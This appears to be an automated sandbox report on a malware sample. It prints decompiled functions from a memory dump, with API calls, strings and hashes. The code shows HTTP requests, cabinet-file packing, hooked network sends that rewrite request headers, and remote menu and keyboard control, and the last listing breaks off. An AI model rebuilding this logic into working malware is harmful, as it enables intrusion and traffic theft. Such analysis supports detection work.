String ID: $D$EFBW$OJPW$PWBW$SBPP$SBPU$U$VPFQ$W$WZSF
API String ID: 1099368488-646741861
Opcode ID: 766b80b776ba74df103d257565504e33cbc151f1c039a3cf0c4ccccf31bb89cf
Instruction ID: a2172be0ee197e82f8c3eec307670b5f574ae8a9cbacb4248be72086ddd4439c
Opcode Fuzzy Hash: 766b80b776ba74df103d257565504e33cbc151f1c039a3cf0c4ccccf31bb89cf
Instruction Fuzzy Hash: 7D512332A04305AADF309A24CC417AB77D4AB46314F18457BE994BB3D2C73E8DA1978F

Uniqueness

Uniqueness Score: -1.00%

Function 004193F1, Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 182
networkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004193F1(intOrPtr* _a4) {
				char _v532;
				void* _v536;
				short _v540;
				char* _v552;
				void* _v568;
				char _v570;
				char _v572;
				char _v576;
				char* _v580;
				void* _v592;
				char _v596;
				char _v600;
				void* _v620;
				void* _v624;
				void* _v628;
				char* _v632;
				long _v648;
				void _v652;
				intOrPtr _v656;
				char _v668;
				intOrPtr _v672;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t53;
				void* _t56;
				intOrPtr _t58;
				void* _t63;
				void* _t67;
				void* _t94;
				void* _t99;
				char* _t101;
				intOrPtr* _t109;
				void* _t113;
				intOrPtr* _t114;
				signed int _t120;
				void* _t122;

				_t122 = (_t120 & 0xfffffff8) - 0x224;
				_t109 = _a4;
				if(E0041641F( &_v532,  *((intOrPtr*)(_t109 + 4))) == 0) {
					L25:
					return 0;
				}
				_t53 = InternetOpenA( *0x4227a4, 0, 0, 0, 0);
				_v536 = _t53;
				if(_t53 == 0) {
					L24:
					E004119C1(_v552);
					E004119C1(_v552);
					goto L25;
				}
				_t56 = InternetConnectA(_t53, _v552, _v540, 0, 0, 3, 0, 0);
				_v592 = _t56;
				if(_t56 == 0) {
					L23:
					InternetCloseHandle(_v568);
					goto L24;
				}
				_t58 =  *_t109;
				_t101 = "POST";
				if( *((char*)(_t58 + 0x18)) != 1) {
					_t101 = "GET";
				}
				_t99 = HttpOpenRequestA(_v592, _t101, _v580, "HTTP/1.1",  *(_t58 + 8), 0, (0 | _v570 != 0x00000002) - 0x00000001 & 0x00800000 | 0x8404f700, 0);
				_v620 = _t99;
				if(_t99 == 0) {
					L22:
					InternetCloseHandle(_v624);
					goto L23;
				} else {
					E00406619(_t101,  &_v576);
					_t63 = 0xe;
					E00419D9D(_t63,  &_v600);
					_t66 =  *_a4;
					if( *((intOrPtr*)( *_a4 + 0x20)) > 0) {
						_t94 = E00412785( &_v632,  &_v600,  *((intOrPtr*)(_t66 + 0x1c)));
						_t122 = _t122 + 0xc;
						if(_t94 > 0) {
							HttpAddRequestHeadersA(_t99, _v632, 0xffffffff, 0xa0000000);
							E004119C1(_v648);
						}
					}
					_t67 = 0xf;
					E00419D9D(_t67,  &_v596);
					_v628 = E00412510( &_v572);
					_t113 = E00411991(2 + _t69 * 6);
					if(_t113 == 0) {
						_t113 = 0;
					} else {
						E0041674A(_t113,  &_v572, _v628);
						_t99 = _v628;
					}
					if(_t113 != 0 && E00412785( &_v632,  &_v596, _t113) > 0) {
						HttpAddRequestHeadersA(_t99, _v632, 0xffffffff, 0xa0000000);
						E004119C1(_v648);
					}
					E004119C1(_t113);
					_t114 = _a4;
					if(HttpSendRequestA(_t99, 0, 0,  *( *_t114 + 0x24),  *( *_t114 + 0x28)) != 1) {
						L21:
						InternetCloseHandle(_t99);
						goto L22;
					} else {
						_v648 = 4;
						_v652 = 0;
						if(HttpQueryInfoA(_t99, 0x20000013,  &_v652,  &_v648, 0) != 1 || _v672 != 0xc8) {
							goto L21;
						} else {
							if(E00413AF7( &_v668, _t99) != 0) {
								E004119C1(_t80);
							}
							E004119C1(_v656);
							E004119C1(_v656);
							 *((intOrPtr*)(_t114 + 8)) = _v668;
							goto L25;
						}
					}
				}
			}

0x004193f7
0x00419400
0x00419411
0x0041961e
0x00419626
0x00419626
0x00419423
0x00419429
0x0041942f
0x0041960c
0x00419610
0x00419619
0x00000000
0x00419619
0x00419444
0x0041944a
0x00419450
0x00419602
0x00419606
0x00000000
0x00419606
0x00419456
0x0041945c
0x00419461
0x00419463
0x00419463
0x00419499
0x0041949b
0x004194a1
0x004195f8
0x004195fc
0x00000000
0x004194a7
0x004194ac
0x004194b7
0x004194b8
0x004194c0
0x004194c5
0x004194d2
0x004194d7
0x004194dc
0x004194ea
0x004194f4
0x004194f4
0x004194dc
0x004194ff
0x00419500
0x0041950e
0x0041951d
0x00419521
0x00419539
0x00419523
0x0041952e
0x00419533
0x00419533
0x0041953d
0x00419562
0x0041956c
0x0041956c
0x00419572
0x00419577
0x0041958e
0x004195f1
0x004195f2
0x00000000
0x00419590
0x004195a1
0x004195a9
0x004195b6
0x00000000
0x004195c2
0x004195ce
0x004195d1
0x004195d1
0x004195da
0x004195e3
0x004195ec
0x00000000
0x004195ec
0x004195b6
0x0041958e

APIs

Part of subcall function 0041641F: InternetCrackUrlA.WININET(?,00000000,00000000,?), ref: 0041644E

InternetOpenA.WININET(00000000,00000000,00000000,00000000,?), ref: 00419423
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00419444
HttpOpenRequestA.WININET(?,POST,?,HTTP/1.1,?,00000000,-00000001,00000000), ref: 00419493
HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 004194EA
HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 00419562
HttpSendRequestA.WININET(00000000,00000000,00000000,?,?), ref: 00419585
HttpQueryInfoA.WININET(00000000,20000013,?,?,00000000), ref: 004195AD
InternetCloseHandle.WININET(00000000), ref: 004195F2
InternetCloseHandle.WININET(?), ref: 004195FC

Part of subcall function 00413AF7: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 00413B0B
Part of subcall function 00413AF7: GetLastError.KERNEL32 ref: 00413B15
Part of subcall function 00413AF7: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 00413B35

Part of subcall function 004119C1: HeapFree.KERNEL32(00000000,00000000,004131B8,00000000,?,?,?,00405C4E,00000000,00406128), ref: 004119D4

InternetCloseHandle.WININET(?), ref: 00419606

Strings

HTTP/1.1, xrefs: 00419485
GET, xrefs: 00419463, 0041948E
POST, xrefs: 0041945C

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Internet$Http$Request$CloseHandleQuery$HeadersOpenOption$ConnectCrackErrorFreeHeapInfoLastSend
String ID: GET$HTTP/1.1$POST
API String ID: 1023423486-2753618334
Opcode ID: c770ea861898683855c7a6f19055910d428729f9ffbba96d0357c90297ee6560
Instruction ID: f545488242c0e7ae169259ad064fd0a74c260ea46216053250fcd51dbe664e74
Opcode Fuzzy Hash: c770ea861898683855c7a6f19055910d428729f9ffbba96d0357c90297ee6560
Instruction Fuzzy Hash: 5F51D2B2008201BBC711AF61DD95ECFBFA9FF84354F00092AF585A2172D739DA85CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0041AC8D, Relevance: 22.6, APIs: 15, Instructions: 132
windowCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E0041AC8D(unsigned int __ecx, struct HWND__* _a4, signed short _a8) {
				struct tagRECT _v20;
				signed int _v24;
				signed int _v28;
				signed short _t37;
				int _t46;
				BYTE* _t47;
				signed short _t51;
				int _t63;
				int _t64;
				unsigned int _t65;
				struct HMENU__* _t70;
				struct HMENU__* _t74;
				void* _t78;

				_t65 = __ecx;
				_t37 = _a8;
				_t78 = _t37 - 0xfffffffd;
				if(_t78 == 0) {
					SetKeyboardState( *0x423e88);
					L23:
					SetEvent( *0x423e84);
					return 0;
				}
				if(_t78 <= 0 || _t37 > 0xffffffff) {
					_v20.top = _t37 >> 0x10;
					_v20.right = _t65 & 0x0000ffff;
					_v20.left = _t37 & 0x0000ffff;
					_v20.bottom = _t65 >> 0x10;
					E0040BC64( &_v20, _t65 >> 0x10, _t37 & 0x0000ffff, 0x423e78, _a4, 0);
					goto L23;
				} else {
					_t70 = GetMenu(_a4);
					if(_t70 == 0) {
						goto L23;
					}
					_v24 = _v24 | 0xffffffff;
					_t46 = GetMenuItemCount(_t70);
					_t63 = 0;
					_v28 = _t46;
					if(_t46 <= 0) {
						L8:
						_t47 =  *0x423e88;
						_push(_t47[0x104]);
						_t64 = MenuItemFromPoint(_a4, _t70, _t47[0x100]);
						if(_t64 == 0xffffffff) {
							goto L23;
						}
						_v28 = GetMenuState(_t70, _t64, 0x400);
						if(_v24 != _t64) {
							EndMenu();
						}
						HiliteMenuItem(_a4, _t70, _t64, 0x480);
						if(_a8 != 0xfffffffe && (_v28 & 0x00000003) == 0) {
							if((_v28 & 0x00000010) == 0) {
								if((_v28 & 0x00000800) == 0) {
									_t51 = GetMenuItemID(_t70, _t64);
									if(_t51 == 0xffffffff) {
										goto L23;
									}
									L20:
									SendMessageW(_a4, 0x111, _t51 & 0x0000ffff, 0);
									goto L23;
								}
								_t51 = 0;
								goto L20;
							}
							_t74 = GetSubMenu(_t70, _t64);
							if(_t74 != 0 && GetMenuItemRect(_a4, _t70, _t64,  &_v20) != 0) {
								TrackPopupMenuEx(_t74, 0x4000, _v20, _v20.bottom, _a4, 0);
							}
						}
						goto L23;
					} else {
						goto L5;
					}
					do {
						L5:
						if(GetMenuState(_t70, _t63, 0x400) < 0) {
							HiliteMenuItem(_a4, _t70, _t63, 0x400);
							_v24 = _t63;
						}
						_t63 = _t63 + 1;
					} while (_t63 < _v28);
					goto L8;
				}
			}

0x0041ac8d
0x0041ac93
0x0041ac9c
0x0041ac9f
0x0041ae1e
0x0041ae24
0x0041ae2a
0x0041ae38
0x0041ae38
0x0041aca5
0x0041aded
0x0041adf9
0x0041ae09
0x0041ae0d
0x0041ae11
0x00000000
0x0041acb4
0x0041acbd
0x0041acc1
0x00000000
0x00000000
0x0041acc7
0x0041accd
0x0041acd3
0x0041acd5
0x0041ace0
0x0041ad06
0x0041ad06
0x0041ad0b
0x0041ad21
0x0041ad26
0x00000000
0x00000000
0x0041ad35
0x0041ad3d
0x0041ad3f
0x0041ad3f
0x0041ad4f
0x0041ad59
0x0041ad6f
0x0041adbe
0x0041adc6
0x0041adcf
0x00000000
0x00000000
0x0041add1
0x0041addf
0x00000000
0x0041addf
0x0041adc0
0x00000000
0x0041adc0
0x0041ad79
0x0041ad7d
0x0041adae
0x0041adae
0x0041ad7d
0x00000000
0x00000000
0x00000000
0x00000000
0x0041ace2
0x0041ace2
0x0041aced
0x0041acf5
0x0041acfb
0x0041acfb
0x0041acff
0x0041ad00
0x00000000
0x0041ace2

APIs

GetMenu.USER32(?), ref: 0041ACB7
GetMenuItemCount.USER32 ref: 0041ACCD
GetMenuState.USER32 ref: 0041ACE5
HiliteMenuItem.USER32(?,00000000,00000000,00000400), ref: 0041ACF5
MenuItemFromPoint.USER32(?,00000000,?,?), ref: 0041AD1B
GetMenuState.USER32 ref: 0041AD2F
EndMenu.USER32 ref: 0041AD3F
HiliteMenuItem.USER32(?,00000000,00000000,00000480), ref: 0041AD4F
GetSubMenu.USER32 ref: 0041AD73
GetMenuItemRect.USER32(?,00000000,00000000,?), ref: 0041AD8D
TrackPopupMenuEx.USER32(00000000,00004000,?,?,?,00000000), ref: 0041ADAE
GetMenuItemID.USER32(00000000,00000000), ref: 0041ADC6
SendMessageW.USER32(?,00000111,?,00000000), ref: 0041ADDF
SetKeyboardState.USER32 ref: 0041AE1E
SetEvent.KERNEL32 ref: 0041AE2A

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$Item$State$Hilite$CountEventFromKeyboardMessagePointPopupRectSendTrack
String ID:
API String ID: 751066993-0
Opcode ID: a847ba1574b71e080fff676a69488b28f9980bbbdcc4d8c6077a4200fc427fd2
Instruction ID: d8f35a2babeee9c044b84aee02200fdd2ad94d7237bf8c1a4937a5c31f97ac84
Opcode Fuzzy Hash: a847ba1574b71e080fff676a69488b28f9980bbbdcc4d8c6077a4200fc427fd2
Instruction Fuzzy Hash: B441E130101305AFD7118F25ED88AAB7BF8FB44769F00062AF855A11F1C7388DA5DB9A

Uniqueness

Uniqueness Score: -1.00%

Function 004156A7, Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 52
libraryloadermemoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004156A7() {
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t7;
				void* _t9;
				intOrPtr _t18;

				if( *0x423c68 != 0) {
					L9:
					 *0x423c68 =  *0x423c68 + 1;
					return 1;
				} else {
					_t2 = LoadLibraryA("cabinet.dll");
					 *0x423c64 = _t2;
					if(_t2 == 0) {
						L8:
						return 0;
					} else {
						 *0x423c50 = GetProcAddress(_t2, "FCICreate");
						 *0x423c54 = GetProcAddress( *0x423c64, "FCIAddFile");
						 *0x422e88 = GetProcAddress( *0x423c64, "FCIFlushCabinet");
						_t7 = GetProcAddress( *0x423c64, "FCIDestroy");
						 *0x423c5c = _t7;
						if( *0x423c50 == 0 ||  *0x423c54 == 0) {
							L7:
							FreeLibrary( *0x423c64);
							goto L8;
						} else {
							_t18 =  *0x422e88; // 0x0
							if(_t18 == 0 || _t7 == 0) {
								goto L7;
							} else {
								_t9 = HeapCreate(0, 0x80000, 0);
								 *0x422e84 = _t9;
								if(_t9 != 0) {
									goto L9;
								} else {
									goto L7;
								}
							}
						}
					}
				}
			}

0x004156b0
0x0041575b
0x0041575b
0x00415764
0x004156b6
0x004156bb
0x004156c1
0x004156c8
0x00415757
0x0041575a
0x004156ce
0x004156e8
0x004156fa
0x0041570c
0x00415711
0x00415713
0x0041571f
0x0041574b
0x00415751
0x00000000
0x00415729
0x00415729
0x0041572f
0x00000000
0x00415735
0x0041573c
0x00415742
0x00415749
0x00000000
0x00000000
0x00000000
0x00000000
0x00415749
0x0041572f
0x0041571f
0x004156c8

APIs

LoadLibraryA.KERNEL32(cabinet.dll,00000000,0041578E,?,004159AA,?,?,00000000,?,?,?), ref: 004156BB
GetProcAddress.KERNEL32(00000000,FCICreate), ref: 004156DB
GetProcAddress.KERNEL32(FCIAddFile), ref: 004156ED
GetProcAddress.KERNEL32(FCIFlushCabinet), ref: 004156FF
GetProcAddress.KERNEL32(FCIDestroy), ref: 00415711
HeapCreate.KERNEL32(00000000,00080000,00000000,004159AA,?,?,00000000,?,?,?), ref: 0041573C
FreeLibrary.KERNEL32(004159AA,?,?,00000000,?,?,?), ref: 00415751

Strings

FCIAddFile, xrefs: 004156DD
FCIDestroy, xrefs: 00415701
FCICreate, xrefs: 004156D5
cabinet.dll, xrefs: 004156B6
FCIFlushCabinet, xrefs: 004156EF

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$Library$CreateFreeHeapLoad
String ID: FCIAddFile$FCICreate$FCIDestroy$FCIFlushCabinet$cabinet.dll
API String ID: 2040708800-1163896595
Opcode ID: 2fde2e746c1cf5345de20bc0d2a3812fe8f1f332dd93e431efc319d49cf00a78
Instruction ID: 20648e428f7e748b32fd24f78ae9bb7ae088a42e45250f0d9ce7d40ab6828e4d
Opcode Fuzzy Hash: 2fde2e746c1cf5345de20bc0d2a3812fe8f1f332dd93e431efc319d49cf00a78
Instruction Fuzzy Hash: 671130B2B40710EACB325F3AAD899A57FB5A3C47527A40537E410B2274DA7C4682DF0C

Uniqueness

Uniqueness Score: -1.00%

Function 00407F00, Relevance: 18.3, APIs: 9, Strings: 3, Instructions: 254
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E00407F00(void* __edx, intOrPtr _a4, signed int _a8, signed char _a12) {
				intOrPtr _v20;
				void* _v24;
				intOrPtr _v36;
				intOrPtr _v40;
				void* _v44;
				void* _v60;
				signed int _v72;
				char _v76;
				signed int _v80;
				signed int _v84;
				signed char _v88;
				signed int _v92;
				void* _v96;
				intOrPtr _v104;
				signed int _v108;
				void* _v112;
				void* _v132;
				void* __esi;
				signed int _t111;
				signed int _t113;
				signed char _t114;
				signed int _t115;
				void* _t117;
				signed char _t121;
				signed int _t122;
				signed int _t125;
				signed int _t128;
				signed char _t130;
				signed char _t136;
				intOrPtr _t149;
				void* _t165;
				signed char _t166;
				void* _t172;
				intOrPtr _t178;
				signed int _t184;
				void* _t186;
				void* _t188;
				signed int _t202;
				signed int _t203;
				signed int _t205;
				void* _t207;

				_t207 = (_t205 & 0xfffffff8) - 0x5c;
				if(E00406473() == 0 || _a8 == 0 || _a12 <= 0) {
					L9:
					_t111 =  *0x42252c(_a4, _a8, _a12);
					goto L10;
				} else {
					EnterCriticalSection(0x422a08);
					_t192 = _a4;
					_t184 = E00406F84(_a4);
					_v84 = _t184;
					if(_t184 == 0xffffffff) {
						L8:
						LeaveCriticalSection(0x422a08);
						goto L9;
					}
					_t186 = _t184 * 0x38 +  *0x422a24;
					if( *(_t186 + 0x20) > 0) {
						L29:
						_t113 =  *(_t186 + 0x24);
						_t188 =  *(_t186 + 0x20) - _t113;
						LeaveCriticalSection(0x422a08);
						_t195 = _a4;
						_t114 =  *0x42252c(_a4,  *((intOrPtr*)(_t186 + 0x1c)) + _t113, _t188);
						_v88 = _t114;
						__eflags = _t114 - 0xffffffff;
						if(_t114 != 0xffffffff) {
							EnterCriticalSection(0x422a08);
							_t115 = E00406F84(_t195);
							__eflags = _t115 - 0xffffffff;
							if(_t115 != 0xffffffff) {
								_t166 = _v88;
								_t117 = _t115 * 0x38 +  *0x422a24;
								__eflags = _t166 - _t188;
								if(_t166 != _t188) {
									 *((intOrPtr*)(_t117 + 0x24)) =  *((intOrPtr*)(_t117 + 0x24)) + _t166;
									_t92 = _t117 + 0x28;
									 *_t92 =  *(_t117 + 0x28) - 1;
									__eflags =  *_t92;
									_v88 = 1;
								} else {
									_t88 = _t117 + 0x1c; // -4336136
									_v88 =  *(_t117 + 0x28);
									E00411A74(E004119C1( *_t88), _t88, 0, 0x10);
								}
							} else {
								_v88 = _v88 | _t115;
								 *0x422a04(0xffffe890, 8);
							}
							LeaveCriticalSection(0x422a08);
						}
						L36:
						_t111 = _v88;
						L10:
						return _t111;
					}
					if( *(_t186 + 8) > 0) {
						L38:
						LeaveCriticalSection(0x422a08);
						_t197 = _a4;
						_t121 =  *0x42252c(_a4, _a8, _a12);
						_v88 = _t121;
						__eflags = _t121 - 0xffffffff;
						if(_t121 != 0xffffffff) {
							EnterCriticalSection(0x422a08);
							_t122 = E00406F84(_t197);
							__eflags = _t122 - 0xffffffff;
							if(_t122 != 0xffffffff) {
								_t172 = _t122 * 0x38 +  *0x422a24;
								_t178 =  *((intOrPtr*)(_t172 + 8));
								__eflags = _v88 - _t178;
								if(_v88 > _t178) {
									E00407042(_t122);
								} else {
									 *((intOrPtr*)(_t172 + 8)) = _t178 - _v88;
								}
							} else {
								_v88 = _v88 | _t122;
								 *0x422a04(0xffffe890, 8);
							}
							LeaveCriticalSection(0x422a08);
						}
						goto L36;
					}
					_t125 = E00407478( &_v76, _t192, _a8, _a12);
					_v92 = _t125;
					if(_t125 != 0xffffffff) {
						__eflags = _v72;
						if(_v72 == 0) {
							L37:
							E00419364( &_v76);
							_t128 = _v80 + _a12;
							__eflags = _t128;
							 *(_t186 + 8) = _t128;
							goto L38;
						}
						_t130 = E00418A36( &_v76);
						_v88 = _t130;
						__eflags = _t130 & 0x00000001;
						if((_t130 & 0x00000001) == 0) {
							_v92 = 0;
							_v88 = 0;
							__eflags = _t130 & 0x00000002;
							if(__eflags != 0) {
								_t203 = E00411A14(__eflags, _a8, _a12);
								 *(_t207 + 0x10) = _t203;
								__eflags = _t203;
								if(_t203 != 0) {
									E004193CE( *((intOrPtr*)(_t186 + 0x10)),  *((intOrPtr*)(_t186 + 0xc)));
									E004119C1( *(_t186 + 0x14));
									E004119C1( *((intOrPtr*)(_t186 + 4)));
									_t149 = E00411E1F(_v76, _v80);
									 *(_t186 + 0x14) =  *(_t186 + 0x14) & 0x00000000;
									_t38 = _t186 + 0x18;
									 *_t38 =  *(_t186 + 0x18) & 0x00000000;
									__eflags =  *_t38;
									 *((intOrPtr*)(_t186 + 4)) = _t149;
									 *((intOrPtr*)(_t186 + 0xc)) = _v36;
									 *((intOrPtr*)(_t186 + 0x10)) =  *((intOrPtr*)(_t207 + 0x68));
									 *((intOrPtr*)(_t207 + 0x14)) = E004168E8(E004168E8(E00416964(_t203, _a12, "Accept-Encoding", "identity"), _t165, _t203, "TE"), _t165, _t203, "If-Modified-Since");
								} else {
									E004193CE( *((intOrPtr*)(_t207 + 0x60)), _v20);
								}
							}
							__eflags = _v84 & 0x00000004;
							if((_v84 & 0x00000004) == 0) {
								L27:
								__eflags = _v92;
								if(_v92 == 0) {
									goto L37;
								}
								E00419364( &_v76);
								_t70 = _t186 + 0x24;
								 *_t70 =  *(_t186 + 0x24) & 0x00000000;
								__eflags =  *_t70;
								 *(_t186 + 8) = _v80;
								 *((intOrPtr*)(_t186 + 0x1c)) = _v92;
								 *(_t186 + 0x20) = _v88;
								 *(_t186 + 0x28) = _a12;
								goto L29;
							}
							_t202 = _v92;
							__eflags = _t202;
							if(__eflags != 0) {
								_t136 = _v88;
							} else {
								_t202 = _a8;
								_t136 = _a12;
							}
							_v84 = _t136;
							_v104 = E00407758(_v84, __eflags, _t202, _v40, _v36,  &_v92);
							E004119C1( *((intOrPtr*)(_t207 + 0x44)));
							__eflags = _v108;
							if(_v108 != 0) {
								__eflags = _t202 - _a8;
								if(_t202 != _a8) {
									E004119C1(_t202);
								}
							} else {
								__eflags = _t202 - _a8;
								if(_t202 == _a8) {
									goto L37;
								}
								_v92 = _t202;
								_v88 = _v84;
							}
							goto L27;
						} else {
							E00419364( &_v76);
							LeaveCriticalSection(0x422a08);
							_t111 =  *0x422a04(0xffffe8a3, 0) | 0xffffffff;
							goto L10;
						}
					} else {
						E00407042(_v84);
						E00419364( &_v76);
						goto L8;
					}
				}
			}

0x00407f06
0x00407f13
0x00407f8b
0x00407f94
0x00000000
0x00407f21
0x00407f27
0x00407f2d
0x00407f35
0x00407f37
0x00407f3e
0x00407f84
0x00407f85
0x00000000
0x00407f85
0x00407f43
0x00407f4d
0x00408129
0x00408129
0x00408135
0x00408137
0x0040813f
0x00408143
0x0040814c
0x00408150
0x00408153
0x00408156
0x0040815c
0x00408161
0x00408164
0x0040817b
0x00408182
0x00408188
0x0040818a
0x004081a9
0x004081ac
0x004081ac
0x004081ac
0x004081af
0x0040818c
0x0040818f
0x00408194
0x004081a2
0x004081a2
0x00408166
0x00408166
0x00408171
0x00408178
0x004081b8
0x004081b8
0x004081be
0x004081be
0x00407f9d
0x00407fa3
0x00407fa3
0x00407f57
0x004081da
0x004081e1
0x004081e6
0x004081ed
0x004081f6
0x004081fa
0x004081fd
0x00408200
0x00408206
0x0040820b
0x0040820e
0x0040822a
0x00408230
0x00408233
0x00408237
0x00408242
0x00408239
0x0040823d
0x0040823d
0x00408210
0x00408210
0x0040821b
0x00408222
0x00408248
0x00408248
0x00000000
0x004081fd
0x00407f68
0x00407f6d
0x00407f74
0x00407fa6
0x00407faa
0x004081c7
0x004081cb
0x004081d4
0x004081d4
0x004081d7
0x00000000
0x004081d7
0x00407fb5
0x00407fba
0x00407fbe
0x00407fc0
0x00407fe6
0x00407fea
0x00407fee
0x00407ff0
0x00408001
0x00408003
0x00408007
0x00408009
0x00408020
0x00408028
0x00408030
0x0040803d
0x00408042
0x00408046
0x00408046
0x00408046
0x0040804f
0x0040805e
0x00408066
0x00408086
0x0040800b
0x00408013
0x00408013
0x00408009
0x0040808a
0x0040808f
0x004080f6
0x004080f6
0x004080fb
0x00000000
0x00000000
0x00408105
0x0040810e
0x0040810e
0x0040810e
0x00408112
0x00408119
0x00408120
0x00408126
0x00000000
0x00408126
0x00408091
0x00408095
0x00408097
0x004080a1
0x00408099
0x00408099
0x0040809c
0x0040809c
0x004080a5
0x004080c4
0x004080c8
0x004080cd
0x004080d2
0x004080eb
0x004080ee
0x004080f1
0x004080f1
0x004080d4
0x004080d4
0x004080d7
0x00000000
0x00000000
0x004080e1
0x004080e5
0x004080e5
0x00000000
0x00407fc2
0x00407fc6
0x00407fcc
0x00407fe1
0x00000000
0x00407fe1
0x00407f76
0x00407f7a
0x00407f7f
0x00000000
0x00407f7f
0x00407f74

APIs

Part of subcall function 00406473: WaitForSingleObject.KERNEL32(00000000,0041D5FF,743C152E,00000002), ref: 0040647B

EnterCriticalSection.KERNEL32(00422A08), ref: 00407F27
LeaveCriticalSection.KERNEL32(00422A08), ref: 00407F85
LeaveCriticalSection.KERNEL32(00422A08,?), ref: 00407FCC
LeaveCriticalSection.KERNEL32(00422A08), ref: 00408137
EnterCriticalSection.KERNEL32(00422A08), ref: 00408156
LeaveCriticalSection.KERNEL32(00422A08), ref: 004081B8
LeaveCriticalSection.KERNEL32(00422A08), ref: 004081E1
EnterCriticalSection.KERNEL32(00422A08), ref: 00408200
LeaveCriticalSection.KERNEL32(00422A08), ref: 00408248

Strings

Accept-Encoding, xrefs: 00408056
If-Modified-Since, xrefs: 0040807A
identity, xrefs: 0040804A

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$Leave$Enter$ObjectSingleWait
String ID: Accept-Encoding$If-Modified-Since$identity
API String ID: 3286975823-3034467039
Opcode ID: bcbe074c28fad4e9d2dd28ed65851ddbd9ebfe4c33012aa10da685d21189c5b8
Instruction ID: 91166bddecff6f5d4a971145e9441aa1d12e903237d3667f1a8718abe336678b
Opcode Fuzzy Hash: bcbe074c28fad4e9d2dd28ed65851ddbd9ebfe4c33012aa10da685d21189c5b8
Instruction Fuzzy Hash: 14A16E71504701AFCB10DF24D945A5EBBE4BF88314F104A2EF895B72E1CB38E955CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0041AC8B, Relevance: 18.1, APIs: 12, Instructions: 101
windowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0041AC8B(void* __eax, unsigned int __ecx, struct HWND__* _a4, signed short _a8) {
				struct tagRECT _v20;
				signed int _v24;
				int _v28;
				signed short _t39;
				int _t48;
				BYTE* _t49;
				signed short _t53;
				int _t65;
				int _t66;
				unsigned int _t67;
				struct HMENU__* _t72;
				struct HMENU__* _t76;
				void* _t85;

				_t67 = __ecx;
				_t39 = _a8;
				_t85 = _t39 - 0xfffffffd;
				if(_t85 == 0) {
					SetKeyboardState( *0x423e88);
				} else {
					if(_t85 <= 0 || _t39 > 0xffffffff) {
						_v20.top = _t39 >> 0x10;
						_v20.right = _t67 & 0x0000ffff;
						_v20.left = _t39 & 0x0000ffff;
						_v20.bottom = _t67 >> 0x10;
						E0040BC64( &_v20, _t67 >> 0x10, _t39 & 0x0000ffff, 0x423e78, _a4, 0);
					} else {
						_t72 = GetMenu(_a4);
						if(_t72 != 0) {
							_v24 = _v24 | 0xffffffff;
							_t48 = GetMenuItemCount(_t72);
							_t65 = 0;
							_v28 = _t48;
							if(_t48 > 0) {
								do {
									if(GetMenuState(_t72, _t65, 0x400) < 0) {
										HiliteMenuItem(_a4, _t72, _t65, 0x400);
										_v24 = _t65;
									}
									_t65 = _t65 + 1;
								} while (_t65 < _v28);
							}
							_t49 =  *0x423e88;
							_push(_t49[0x104]);
							_t66 = MenuItemFromPoint(_a4, _t72, _t49[0x100]);
							if(_t66 != 0xffffffff) {
								_v28 = GetMenuState(_t72, _t66, 0x400);
								if(_v24 != _t66) {
									EndMenu();
								}
								HiliteMenuItem(_a4, _t72, _t66, 0x480);
								if(_a8 != 0xfffffffe && (_v28 & 0x00000003) == 0) {
									if((_v28 & 0x00000010) == 0) {
										if((_v28 & 0x00000800) == 0) {
											_t53 = GetMenuItemID(_t72, _t66);
											if(_t53 != 0xffffffff) {
												goto L21;
											}
										} else {
											_t53 = 0;
											L21:
											SendMessageW(_a4, 0x111, _t53 & 0x0000ffff, 0);
										}
									} else {
										_t76 = GetSubMenu(_t72, _t66);
										if(_t76 != 0 && GetMenuItemRect(_a4, _t72, _t66,  &_v20) != 0) {
											TrackPopupMenuEx(_t76, 0x4000, _v20, _v20.bottom, _a4, 0);
										}
									}
								}
							}
						}
					}
				}
				SetEvent( *0x423e84);
				return 0;
			}

0x0041ac8b
0x0041ac93
0x0041ac9c
0x0041ac9f
0x0041ae1e
0x0041aca5
0x0041aca5
0x0041aded
0x0041adf9
0x0041ae09
0x0041ae0d
0x0041ae11
0x0041acb4
0x0041acbd
0x0041acc1
0x0041acc7
0x0041accd
0x0041acd3
0x0041acd5
0x0041ace0
0x0041ace2
